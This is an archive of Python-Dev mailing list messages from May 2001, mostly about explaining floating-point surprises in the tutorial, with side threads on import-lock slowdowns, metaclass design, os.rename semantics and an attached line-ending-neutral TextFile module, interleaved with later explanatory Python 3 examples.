--Guido van Rossum (home page: http://www.python.org/~guido/) From MarkH at ActiveState.com Tue May 22 01:06:39 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:06:39 +1000 Subject: [Python-Dev] FP vs.
tutorial In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com> Message-ID: > > + Happy to add text explaining the existence of surprises, and > > providing a URL. Do the floating-point morons on Python-Dev > > find this one comprehensible?: Hey - I resemble that remark! > > http://www.lahey.com/float.htm I quite liked the tone of this note. The Python-dev morons probably could make good sense of this, but only due to the relentless persistence of a certain timbot. If not for Tim, I would have forgotten completely about binary floating point versus decimal floating point. IIRC, me and about 40 other guys were desperately trying to get the attention of the single CS female on the day that lecture was given. (Actually, that is a pretty safe bet - _all_ lectures were spent that way :) However, without a little additional background I doubt the masses would be able to get too far into this. As Tim has said a few times, most people won't care - they just want it to work! > I was thinking more of immortalizing this one: > > http://www.python.org/cgi-bin/moinmoin/RepresentationError IMO, this is a little worse. There is less "background". Eg, in almost the first paragraph we see:

"""
Rewriting

 1      J
--- ~= ----
10     2**N
"""

And I went "huh? Where did j and N spring from?". Reading a bit further made it clear, but this document did seem a little impenetrable to floating point or maths newbies. It seems to me that the RepresentationError document was written for people with a decent background in maths - exactly the sort of people who _don't_ need such a document. Just-my-0.020000002-cents-worth ly, Mark.
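Earlier in this thread, Tim corrected the idea that decimal floating point is "more accurate" than binary. A small illustration uses Python 3's standard `decimal` module. That module is a later addition to the standard library, not the Decimal package Aahz was writing at the time. The sketch assumes the default 28-digit context. Decimal stores 0.1 exactly, but 1/3 must still be rounded, so decimal moves representation error to different numbers rather than removing it. The example does not demonstrate Tim's stronger claim that decimal is slightly worse.

```python
from decimal import Decimal, localcontext

with localcontext() as ctx:
    ctx.prec = 28                          # the default precision, made explicit
    third = Decimal(1) / Decimal(3)        # rounded to 28 significant digits
    print(third)                           # 0.3333333333333333333333333333
    print(third * 3)                       # 0.9999999999999999999999999999, not 1
    print(Decimal("0.1") * 3 == Decimal("0.3"))   # True: 0.1 is exact in decimal

print(0.1 * 3 == 0.3)                      # False: 0.1 is inexact in binary
```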
From jeremy at digicool.com Tue May 22 01:13:09 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Mon, 21 May 2001 19:13:09 -0400 (EDT) Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> References: <200105182107.RAA16214@cliff.concentric.net> Message-ID: <15113.41221.839653.822246@slothrop.digicool.com> We looked at the SecondImport test case today. It's a good test case for programs that execute "import os" in a time-critical inner loop :-). The primary reason it is slower is the import lock that was added after 1.5.2. The benchmark, run in isolation, spends about 6 percent of its time in the locking code. Since it only spends about 20 percent of its time actually doing imports, this is a pretty substantial cost. It seems possible to eliminate some of the cost by using a special marker in sys.modules that means: "This is not a module, but it's being loaded by another thread." But Guido doesn't sound interested in optimizing programs with imports in inner loops. Jeremy From tim at digicool.com Tue May 22 01:20:16 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 21 May 2001 19:20:16 -0400 Subject: [Python-Dev] test_mailbox now fails on Windows Message-ID: Appears to be because new code uses os.link, which doesn't exist on Windows. BTW, test_urllib2.py is still failing on Windows (and has been for a couple of weeks). From michel at digicool.com Tue May 22 01:42:49 2001 From: michel at digicool.com (Michel Pelletier) Date: Mon, 21 May 2001 16:42:49 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Mark Hammond wrote: > > > + Happy to add text explaining the existence of surprises, and > > > providing a URL. Do the floating-point morons on Python-Dev > > > find this one comprehensible?: > > Hey - I resemble that remark! As they say in the south, "mah-self" > > > http://www.lahey.com/float.htm > > I quite liked the tone of this note. 
The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. I liked the tone too, but it really goes into a lot of detail, there's this problem, and that one, oh and also *this* one and then there's *that* and the other thing, and after a while you get the impression that floating-point is for the insane. > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys were > desperately trying to get the attention of the single CS female on the day > that lecture was given. (Actually, that is a pretty safe bet - _all_ > lectures were spent that way :) The funny thing about that is we were in *Long Beach* (I assume you mean IPC9), if you wanted to see beautiful, scarcely clothed women in an acceptable public venue you wouldn't have had to go far, and they would have probably had more interesting "significant bits" (it's none of anyone's business where *I* was during the lectures ;). Someone on the Zope list proposed P4W (Python for Women). Poor, desperate souls. Obviously, P4E includes them too!! > > I was thinking more of immortalizing this one: > > > > http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. I agree. Equations should not be needed to explain this. -Michel From MarkH at ActiveState.com Tue May 22 01:47:06 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Tue, 22 May 2001 09:47:06 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: > > The funny thing about that is we were in *Long Beach* (I > assume you mean IPC9), if you wanted to see beautiful, scarcely clothed Actually, I meant the computer science lectures all those years ago. Literally one female. And-not-much-has-changed ly, Mark.
From guido at digicool.com Tue May 22 05:22:40 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:22:40 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000." References: Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com> Hi Alan, Thanks a lot for your input. I am cc'ing this reply to python-dev because I think my reply will be interesting for others. (Python-dev'ers: Alan expressed concern that introducing Smalltalk metaclasses would make Python unnecessarily complicated.) The way my thinking is currently going, it's not likely that Python will get a metaclass system similar to Smalltalk. However, unifying types and classes is useful for other reasons: please go to http://python.sourceforge.net/peps/ to read PEP 252 which explains how introspection can become simpler and more powerful by unifying the introspection mechanisms for types and classes. There will still be metaclasses, but the metaclasses will be less important than in Smalltalk. Class methods as commonly seen in Smalltalk are not high on my priority list, and the metaclass hierarchy won't be parallelling the regular class hierarchy. Instead, most metaclass programming will be done in C by programmers who want to implement alternative class policies. For example, the current class implementation gives each class a __dict__ for methods and class variables, and dynamically searches the class hierarchy for methods. An alternative inheritance policy could merge the __dict__ of the base class(es) with the __dict__ of the derived class at class declaration time: this would make method lookup a single dict lookup no matter how many levels of base classes are involved, at the cost of making classes less dynamic, because a change to a base class won't be seen in a derived class. 
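Guido describes an alternative policy that merges base-class dictionaries into the derived class when the class is declared. Today's Python 3, where metaclasses can be written in pure Python, can approximate it. What follows is a hypothetical sketch. The name `FlatteningMeta` is invented here, and this is not the C-level design Guido describes. When the class statement runs, the metaclass copies inherited non-dunder attributes into the new class's own `__dict__`. A method is then found with a single dictionary lookup, and a later change to a base-class method is not seen by the derived class.

```python
class FlatteningMeta(type):
    """Hypothetical metaclass: merge inherited attributes into each new
    class's own namespace when the class statement runs."""

    def __new__(mcls, name, bases, namespace):
        merged = {}
        # Visit bases right-to-left, and each base's MRO from object
        # downward, so nearer definitions overwrite farther ones.  This
        # only roughly mimics normal lookup order, for simple hierarchies.
        for base in reversed(bases):
            for klass in reversed(base.__mro__):
                for key, value in vars(klass).items():
                    if not key.startswith("__"):   # skip __dict__, __module__, ...
                        merged[key] = value
        merged.update(namespace)   # the class body's own definitions win
        return super().__new__(mcls, name, bases, merged)


class Base(metaclass=FlatteningMeta):
    def greet(self):
        return "hello"


class Derived(Base):   # inherits FlatteningMeta as its metaclass
    pass


print("greet" in vars(Derived))       # True: copied into Derived itself
Base.greet = lambda self: "changed"   # a later change to the base class...
print(Derived().greet())              # ...is not seen: prints hello
print(Base().greet())                 # prints changed
```

This shows the trade-off Guido names. Lookup no longer walks the hierarchy, but classes become less dynamic.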
A metaclass controls method lookup and class construction, and thus a different metaclass can be used to change this policy for selected class hierarchies without changing the default policy (which would be backwards incompatible). Other policies under control of a metaclass could include overriding hooks for getattr and setattr, alternative mechanisms to store instance variables (e.g. slot-based rather than dict-based), and so on. While I think I can make it possible to write metaclasses in pure Python (by subclassing types.TypeType), I expect that most metaprogramming will be done in C, for performance reasons and for maximum flexibility. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Tue May 22 05:55:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 21 May 2001 23:55:26 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT." References: Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com> > [Guido] > > I would like to break this down by defining the mapping between cmp() > > and rich comparisons. [Tim] > Good idea! Followed by many nitpicking questions about what I meant. As a matter of process, I think it's better to try to channel instead of challenge me. I just don't seem to have the concentration necessary to come up with all the details needed to make this worthy of a language definition, and you do. If you want a BDFL proclamation on currently gray areas in the rules, or a reversal of what the current implementation does in some cases, please draft a definition with a few leading questions. --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Tue May 22 06:02:18 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 22 May 2001 00:02:18 -0400 Subject: [Python-Dev] FP vs. 
tutorial In-Reply-To: Message-ID: [Mark Hammond, on http://www.lahey.com/float.htm] > I quite liked the tone of this note. The Python-dev morons probably could > make good sense of this, but only due to the relentless persistence of a > certain timbot. > > If not for Tim, I would have forgotten completely about binary floating > point versus decimal floating point. IIRC, me and about 40 other guys > were desperately trying to get the attention of the single CS female on > the day that lecture was given. (Actually, that is a pretty safe bet - > _all_ lectures were spent that way :) I remember guys like you. Well guess what? You ended up with a baby, while I'm known on two continents as the author of tabnanny.py. Ha! Revenge is a dish best eaten cold. > However, without a little additional background I doubt the masses would > be able to get too far into this. There's only so much you can say to unmotivated people who are also unwilling to learn. That's not my problem. Finding them a gentle intro from which they *could* learn isn't either, but typing a URL is easy enough that I don't mind. Here: I want to script MS Word with Python. I don't know COM and refuse to learn anything about it. I'd rather not install win32all either, and import statements confuse me. Why don't you make it easy for me? It's the same thing -- you can point them at what they need to learn if they're serious, else they're simply out of luck. [And on] >> http://www.python.org/cgi-bin/moinmoin/RepresentationError > > IMO, this is a little worse. In one sense it's much worse: it's only trying to explain a single cause of fp surprises. OTOH, it explains it precisely while giving the reader the tools needed to do an exact analysis of any case of that particular class. The Lahey link touches on all the common sources of surprises, but leaves them fuzzy. > There is less "background". Eg, in almost the first paragraph we see:
>
> """
> Rewriting
>
>  1      J
> --- ~= ----
> 10     2**N
> """
>
> And I went "huh?
Where did j and N spring from?". Reading a bit further > made it clear, but this document did seem a little impenetrable to > floating point or maths newbies. It did its job for them if it simply scared them <0.5 wink>. > It seems to me that the RepresentationError document was written for > people with a decent background in maths - There's nothing more complicated than integer division there. > exactly the sort of people who _don't_ need such a document. They actually do: regardless of math background, nothing about f.p. is obvious before studying f.p. as a subject in its own right. It's "not like" anything else, and in previous lives I spent a good chunk of my work time explaining the same stuff to doctorates. Mathematicians were actually the hardest audience at first, perhaps because they had the hardest time admitting they didn't already understand it; after getting beyond bruised professional pride, though, they were the easiest audience to bring up to speed. From tim at digicool.com Tue May 22 06:58:21 2001 From: tim at digicool.com (Tim Peters) Date: Tue, 22 May 2001 00:58:21 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Michel Pelletier, on http://www.lahey.com/float.htm] > I liked the tone too, but it really goes into a lot of detail, there's > this problem, and that one, oh and also *this* one and then there's > *that* and the other thing, and after a while you get the impression > that floating-point is for the insane. Using an unfamiliar power tool with sharp edges, and while blindfolded, is insane. [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > I agree. Equations should not be needed to explain this. There's exactly one equation on that page, saying that one ratio of two integers is approximately equal to another ratio of two integers. 
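Mark asked where J and N come from in the RepresentationError equation. Here, J is the integer significand and N the power of two, chosen so that J/2**N is the closest such fraction to 1/10. The sketch below computes them directly. It assumes an IEEE-754 double with a 53-bit significand, a fraction strictly between 0 and 1, and no subnormals. The helper name `best_double_fraction` is hypothetical.

```python
from fractions import Fraction


def best_double_fraction(numer: int, denom: int, bits: int = 53):
    """Hypothetical helper: for 0 < numer/denom < 1, return (J, N) such that
    J / 2**N is the nearest value whose J has exactly `bits` bits,
    i.e. 2**(bits-1) <= J < 2**bits (53 bits for an IEEE-754 double)."""
    assert 0 < numer < denom
    N = 0
    # Smallest N for which the integer quotient already has `bits` bits.
    while (numer << N) // denom < (1 << (bits - 1)):
        N += 1
    q, r = divmod(numer << N, denom)
    # Round to nearest, ties to even, as IEEE-754 does by default.
    if 2 * r > denom or (2 * r == denom and q & 1):
        q += 1
    if q == 1 << bits:          # rounding carried into an extra bit
        q >>= 1
        N -= 1
    return q, N


J, N = best_double_fraction(1, 10)
print(J, N)                                  # 7205759403792794 56
print(Fraction(0.1) == Fraction(J, 2 ** N))  # True: exactly the stored 0.1
```

Because 2**56 / 10 leaves a remainder of 6, more than half of 10, the quotient rounds up. The stored 0.1 is therefore slightly larger than 1/10, which is why the longer repr shows 0.10000000000000001.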
If that's too much for you, and you weren't satisfied with the *initial* hand-wavy explanation ("1/10 is not exactly representable as a binary fraction") either, then it's up to you to do better than the latter without actually saying anything useful:

Q: Why is Python broken:

>>> 0.1
0.10000000000000001

A: [your turn]

From gward at python.net Tue May 22 15:41:57 2001 From: gward at python.net (Greg Ward) Date: Tue, 22 May 2001 09:41:57 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: ; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400 References: Message-ID: <20010522094157.A1245@gerg.ca> On 21 May 2001, Tim Peters said: > + Happy to add text explaining the existence of surprises, and > providing a URL. Do the floating-point morons on Python-Dev > find this one comprehensible?: > > http://www.lahey.com/float.htm I found this article more useful, interesting, and informative than whatever I learned about binary floating-point in my academic years. Good link, Tim. Two catches:
* I can just barely follow the FORTRAN examples; I very much doubt the average Python newbie would have any more luck than me
* I tried several of the FORTRAN examples in Python, and did not witness any of the gotchas they are meant to illustrate. Possibly it's just single-precision vs. double-precision difference, but Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 doesn't demonstrate the same gotchas as that article does.
Greg -- Greg Ward - geek gward at python.net http://starship.python.net/~gward/ Ban the bomb -- save the world for conventional warfare. From skip at pobox.com Tue May 22 18:01:40 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 22 May 2001 11:01:40 -0500 Subject: [Python-Dev] type/class unification and ExtensionClass Message-ID: <15114.36196.4677.99240@beluga.mojam.com> I know Guido has recently been working on some of the type/class unification issues (PEPs 252 and 253). Will this affect ExtensionClass?
In particular, will it go away or have to be reworked significantly for Python 2.2 or 2.3? The new PyGtk wrappers use the ExtensionClass module. I'm curious about how hard it would be to move away from ExtensionClass for these wrappers. My reading of PEP 253 suggests this shouldn't be too difficult. I'd ask Guido directly, but I figure other people on this list might also have useful input on the issue and/or be able to answer, saving him the time. At any rate, he will see it posted here just the same. Thx, Skip From guido at digicool.com Tue May 22 18:23:52 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 12:23:52 -0400 Subject: [Python-Dev] type/class unification and ExtensionClass In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT." <15114.36196.4677.99240@beluga.mojam.com> References: <15114.36196.4677.99240@beluga.mojam.com> Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com> > I know Guido has recently been working on some of the type/class unification > issues (PEPs 252 and 253). And I'm not done yet. :-) > Will this affect ExtensionClass? In particular, > will it go away or have to be reworked significantly for Python 2.2 or 2.3? Probably. Jim Fulton in particular asked me to work on this because he wants to phase out ExtensionClass. > The new PyGtk wrappers use the ExtensionClass module. I'm curious about how > hard it would be to move away from ExtensionClass for these wrappers. My > reading of PEP 253 suggests this shouldn't be too difficult. I don't think so either. > I'd ask Guido directly, but I figure other people on this list might also > have useful input on the issue and/or be able to answer, saving him the > time. At any rate, he will see it posted here just the same. --Guido van Rossum (home page: http://www.python.org/~guido/) From michel at digicool.com Tue May 22 23:44:09 2001 From: michel at digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 14:44:09 -0700 (PDT) Subject: [Python-Dev] FP vs. 
tutorial In-Reply-To: Message-ID: On Tue, 22 May 2001, Tim Peters wrote: > [Michel Pelletier, on http://www.lahey.com/float.htm] > > I liked the tone too, but it really goes into a lot of detail, there's > > this problem, and that one, oh and also *this* one and then there's > > *that* and the other thing, and after a while you get the impression > > that floating-point is for the insane. > > Using an unfamiliar power tool with sharp edges, and while blindfolded, is > insane. I should have been more clear, I liked the first couple of paragraphs for their descriptions, and there is certainly nothing wrong with the document as it stands, but such an explanation would be a bit too lengthy and boring to a typical fifth grader or photoshop guru going through the Tutorial and dabbling in programming for the very first time. > [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError] > > > I agree. Equations should not be needed to explain this. > > There's exactly one equation on that page, saying that one ratio of two > integers is approximately equal to another ratio of two integers. Who was it that said every equation will halve your audience? I agree with that, the tutorial should try to be as broad and simple as possible. > If that's > too much for you, and you weren't satisfied with the *initial* hand-wavy > explanation ("1/10 is not exactly representable as a binary fraction") > either, then it's up to you to do better than the latter without actually > saying anything useful: The latter is fine, although I think the first document hand-waves better. -Michel From skip at pobox.com Tue May 22 23:54:42 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 22 May 2001 16:54:42 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform Message-ID: <15114.57378.887742.531145@beluga.mojam.com> Couldn't figure out why this message never generated any comment.
Turns out it didn't reach the list because the host I sent it from (dynamic4.tttech.com) couldn't be resolved. I just noticed it in my errors mailbox and am sending it out again. ------------------------------------------------------------------------------ It was brought to my attention a week ago by a client that os.rename semantics differ between Unix and Windows. On Unix, if the destination file already exists it is silently deleted. On Windows, an exception is raised. I was able to verify this for Python 2.0 on Windows98. I assume nothing changed for 2.1, but I can't verify that. (Windows trashed my partition table and my Linux root partition while I was downloading 2.1. Consequently, I no longer run Windows. Take that, Bill...) I haven't checked the Mac yet (will do that when I get back to the US), but I think that os.rename should have the same semantics across all platforms. To the extent reasonably possible, I think this should also be true of other common functions exposed through the os module. On the (unsupportable) theory that to-date, more Python apps have been written and/or deployed on Unix-like systems and that where Windows apps are concerned, many developers will have added a thin wrapper to mimic the Unix semantics, I think less breakage would result if the Unix semantics were implemented in the Windows version. It appears that is what POSIX compliance would demand as well. Skip From fdrake at acm.org Tue May 22 23:55:29 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 17:55:29 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com> Michel Pelletier writes: > as it stands, but such an explanation would be a bit too lengthy and > boring to a typical fifth grader or photoshop guru going through the > Tutorial and dabbling in programming for the very first time.
But that's not the audience the Python Tutorial is targeted to -- readers are expected to be essentially competent in at least one "3rd generation" language. Maybe a few will shy away from a simple equation, but not so many. Those who do would do well to shy away from FP as well. ;-) -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Wed May 23 00:04:11 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Tue, 22 May 2001 18:04:11 -0400 (EDT) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> skip at pobox.com writes: > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were I don't know whether there are more deployed Python apps on Unix than on Windows (and I've no good idea about how to find out), but I think unifying the semantics one way or the other is a good thing. Regardless of which set of semantics is chosen. -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From mwh at python.net Wed May 23 00:07:12 2001 From: mwh at python.net (Michael Hudson) Date: 22 May 2001 23:07:12 +0100 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)" References: Message-ID: Michel Pelletier writes: > Who was it that said every equation will halve your audience? It was Stephen Hawking's editor when he was preparing A Brief History Of Time (or at least, it gets mentioned in the preface; the advice may be older). Cheers, M. -- 7. It is easier to write an incorrect program than understand a correct one.
-- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html From jeremy at digicool.com Wed May 23 00:57:40 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Tue, 22 May 2001 18:57:40 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.61156.692322.674137@slothrop.digicool.com> >>>>> "MWH" == Michael Hudson writes: MWH> Michel Pelletier writes: >> Who was it that said every equation will halve your audience? MWH> It was Stephen Hawking's editor when he was preparing A Brief MWH> History Of Time (or at least, it gets mentioned in the preface; MWH> the advice may be older). There's a similar saw about excerpts of books in foreign languages. I believe I first read it in reference to Umberto Eco's Foucault's Pendulum, which starts with a full page of Hebrew. Jeremy From chrishbarker at home.net Wed May 23 01:21:01 2001 From: chrishbarker at home.net (Chris Barker) Date: Tue, 22 May 2001 16:21:01 -0700 Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line conversion? References: <20010414192445-r01010600-f8273ce6@213.84.27.177> Message-ID: <3B0AF45D.732126E6@home.net> Just van Rossum wrote: > Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't > seem to help focussing on actual content... > > Just Just (or anyone else) Have you made any progress on this PEP? I'd like to see it happen, so if you haven't done it, I'll try to find the time to make a start on it myself. I have written a simple class that implements a line-ending-neutral text file. I wrote it because I have a need for it, and I thought it would be a reasonable prototype for any syntax and methods we might want to use in an actual implementation. I doubt anyone would find the methods I used particularly clean or elegant (or fast) but it's the first thing I've come up with, and it seems to work. I've enclosed the module with this email. If that doesn't work, let me know and I'll put it on a website.
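The heart of Chris's approach is translating every line-ending convention to "\n" on input. As a minimal sketch in modern Python 3 (an assumption; the attached module targets Python 2.1), with the hypothetical helper names normalize_newlines and universal_lines, the translation and a mixed-ending line split look like this:

```python
def normalize_newlines(text):
    r"""Translate DOS ("\r\n") and old-Mac ("\r") line endings into "\n"."""
    # "\r\n" must be collapsed first; otherwise each DOS line ending
    # would turn into two newlines.
    return text.replace("\r\n", "\n").replace("\r", "\n")


def universal_lines(text):
    r"""Split text with mixed line endings into lines ending in "\n"."""
    pieces = normalize_newlines(text).split("\n")
    lines = [piece + "\n" for piece in pieces[:-1]]
    if pieces[-1]:
        # the final line had no terminator; keep it unterminated
        lines.append(pieces[-1])
    return lines


print(universal_lines("a\r\nb\rc\nd"))   # ['a\n', 'b\n', 'c\n', 'd']
```

The same ordering of the two replace() calls appears in the module's read() and readlines() methods.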
-Chris

-- Christopher Barker, Ph.D.
ChrisHBarker at home.net
http://members.home.net/barkerlohmann
Oil Spill Modeling
Water Resources Engineering
Coastal and Fluvial Hydrodynamics
------------------------------------------------------------------------
-------------- next part --------------
#!/usr/bin/env python

"""
TextFile.py : a module that provides a UniversalTextFile class, and a
replacement for the native python "open" command that provides an
interface to that class.

It would usually be used as:

from TextFile import open

then you can use the new open just like the old one (with some added
flags and arguments)

or

import TextFile
file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize])
"""

import os

## Re-map the open function
_OrigOpen = open

def open(filename,flags = "r",bufsize = -1, LineEndingType = "", LineBufferSize = ""):
    """
    A new open function, that returns a regular python file object for
    the old calls, and returns a new nifty universal text file when
    required.

    This works just like the regular open command, except that a new
    flag and a new parameter have been added.

    Call:

    file = open(filename,flags = "r",bufsize = -1, LineEndingType = ""):

    - filename is the name of the file to be opened
    - flags is a string of one letter flags, the same as the standard
      open command, plus a "t" for universal text file.
    - - "b" means binary file, this returns the standard binary file object
    - - "t" means universal text file
    - - "r" for read only
    - - "w" for write. If there is both "w" and "t" then the user can
        specify a line ending type to be used with the LineEndingType
        parameter.
    - - "a" means append to existing file
    - bufsize specifies the buffer size to be used by the system. Same
      as the regular open function
    - LineEndingType is used only for writing (and appending) files, to
      specify a non-native line ending to be written.
    - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the
        characters themselves( "\r\n", etc. ). "native" will result in
        using the standard file object, which uses whatever is native for
        the system that python is running on.
    - LineBufferSize is the size of the buffer used to read data in a
      readline() operation. The default is currently set to 200
      characters. If you will be reading files with many lines over 200
      characters long, you should set this number to the largest
      expected line length.
    """
    if "t" in flags: # this is a universal text file
        if ("w" in flags or "a" in flags) and LineEndingType == "native":
            return _OrigOpen(filename,flags.replace("t",""), bufsize)
        return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize)
    else: # this is a regular old file
        return _OrigOpen(filename,flags,bufsize)

class UniversalTextFile:
    """
    A class that acts just like a python file object, but has a mode
    that allows the reading of arbitrarily formatted text files, i.e.
    with either Unix, DOS or Mac line endings. [\n , \r\n, or \r]

    To keep it truly universal, it checks for each of these line ending
    possibilities at every line, so it should work on a file with mixed
    endings as well.
    """
    def __init__(self,filename,flags = "r",LineEndingType = "native",LineBufferSize = ""):
        self._file = _OrigOpen(filename,flags.replace("t","")+"b")

        LineEndingType = LineEndingType.lower()
        # an empty LineEndingType (the default passed by open()) means native
        if LineEndingType in ("", "native"):
            self.LineSep = os.linesep # a string, not a function
        elif LineEndingType == "dos":
            self.LineSep = "\r\n"
        elif LineEndingType == "posix" or LineEndingType == "unix" :
            self.LineSep = "\n"
        elif LineEndingType == "mac":
            self.LineSep = "\r"
        else:
            self.LineSep = LineEndingType

        ## some attributes
        self.closed = 0
        self.mode = flags
        self.softspace = 0
        if LineBufferSize:
            self._BufferSize = LineBufferSize
        else:
            self._BufferSize = 200 # matches the default documented in open()

    def readline(self):
        start_pos = self._file.tell()
        ##print "Current file position is:", start_pos
        line = ""
        TotalBytes = 0
        Buffer = self._file.read(self._BufferSize)
        while Buffer:
            ##print "Buffer = ",repr(Buffer)
            newline_pos = Buffer.find("\n")
            return_pos = Buffer.find("\r")
            if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = return_pos+1
                if return_pos == len(Buffer)-1 and self._file.read(1) == "\n":
                    # the "\r" ended the buffer and was really the first
                    # half of a DOS "\r\n" split across two reads
                    TotalBytes = TotalBytes+1
                break
            elif newline_pos >= 0: # we have a Posix line
                line = Buffer[:newline_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            else: # we need a larger buffer
                NewBuffer = self._file.read(self._BufferSize)
                if NewBuffer:
                    Buffer = Buffer + NewBuffer
                else: # we are at the end of the file, without a line ending.
                    self._file.seek(start_pos + len(Buffer))
                    return Buffer

        self._file.seek(start_pos + TotalBytes)
        return line

    def readlines(self,sizehint = None):
        """
        readlines acts like the regular readlines, except that it
        understands any of the standard text file line endings ("\r\n",
        "\n", "\r").

        If sizehint is used, it will read a maximum of that many bytes.
        It will not round up, as the regular readlines does. This means
        that if your buffer size is less than the length of the next
        line, you won't get anything.
        """
        if sizehint:
            Data = self._file.read(sizehint)
        else:
            Data = self._file.read()

        if len(Data) == sizehint:
            #print "The buffer is full"
            FullBuffer = 1
        else:
            FullBuffer = 0
        Data = Data.replace("\r\n","\n").replace("\r","\n")
        Lines = [line + "\n" for line in Data.split('\n')]
        #print Lines
        ## If the last line is only a linefeed it is an extra line
        if Lines[-1] == "\n":
            del Lines[-1]
        ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on.
        else:
            ## or it's the end of the buffer
            if FullBuffer:
                #print "the file is at:",self._file.tell()
                #print "the last line has length:",len(Lines[-1])
                self._file.seek(-(len(Lines[-1])-1),1) # reset the file position
                del(Lines[-1])
            else:
                Lines[-1] = Lines[-1][:-1]
        return Lines

    def readnumlines(self,NumLines = 1):
        """
        readnumlines is an extension to the standard file object. It
        returns a list containing the number of lines that are requested.
        I have found this to be very useful, and it allows me to avoid
        the many loops like:

        lines = []
        for i in range(N):
            lines.append(file.readline())

        Also, if I ever get around to writing this in C, it will provide
        a speed improvement.
        """
        Lines = []
        while len(Lines) < NumLines:
            Lines.append(self.readline())
        return Lines

    def read(self,size = None):
        """
        read acts like the regular read, except that it translates any of
        the standard text file line endings ("\r\n", "\n", "\r") into a
        "\n"

        If size is used, it will read a maximum of that many bytes,
        before translation. This means that if the line endings have more
        than one character, the size returned will be smaller. This could
        be patched, but it didn't seem worth it. If you want that much
        control, use a binary file.
        """
        if size:
            Data = self._file.read(size)
        else:
            Data = self._file.read()

        return Data.replace("\r\n","\n").replace("\r","\n")

    def write(self,string):
        """
        write is just like the regular one, except that it uses the line
        separator specified when the file was opened for writing or
        appending.
        """
        self._file.write(string.replace("\n",self.LineSep))

    def writelines(self,list):
        for line in list:
            self.write(line)

    # The rest of the standard file methods mapped
    def close(self):
        self._file.close()
        self.closed = 1
    def flush(self):
        self._file.flush()
    def fileno(self):
        return self._file.fileno()
    def seek(self,offset,whence = 0):
        self._file.seek(offset,whence)
    def tell(self):
        return self._file.tell()

